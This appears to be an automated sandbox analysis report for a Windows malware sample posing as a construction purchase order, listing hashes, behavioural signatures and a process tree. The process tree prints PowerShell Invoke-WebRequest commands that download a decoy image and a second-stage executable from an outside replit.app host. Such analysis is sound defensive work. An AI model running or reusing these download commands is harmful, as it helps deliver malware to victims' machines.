Analysis
-
max time kernel
117s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29-07-2024 07:13
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
jdconstructnOrderfdp..exe
Resource
win10v2004-20240709-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2748 powershell.exe 2640 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2748 powershell.exe 2640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 2708 wrote to memory of 2872 2708 jdconstructnOrderfdp..exe cmd.exe PID 2708 wrote to memory of 2872 2708 jdconstructnOrderfdp..exe cmd.exe PID 2708 wrote to memory of 2872 2708 jdconstructnOrderfdp..exe cmd.exe PID 2708 wrote to memory of 2872 2708 jdconstructnOrderfdp..exe cmd.exe PID 2872 wrote to memory of 2748 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 2748 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 2748 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 2640 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 2640 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 2640 2872 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cb03fc5057bb504c410d7dfc9340cec0
SHA1688aa6bf36b4f06bee011d9cfe74e90b8e671b1e
SHA256184994eef087e2619c0725840ca43212800b62b32774d2a5be254986e36dd7f7
SHA512d897eb6a3dfc04f9fa29b7e7e3f73f191d9ee70d74a299de95a4c27a723c94aef3c41cc795b1c52108bfb73c92ecc8e72d36f56c07b510c35923d6081de77641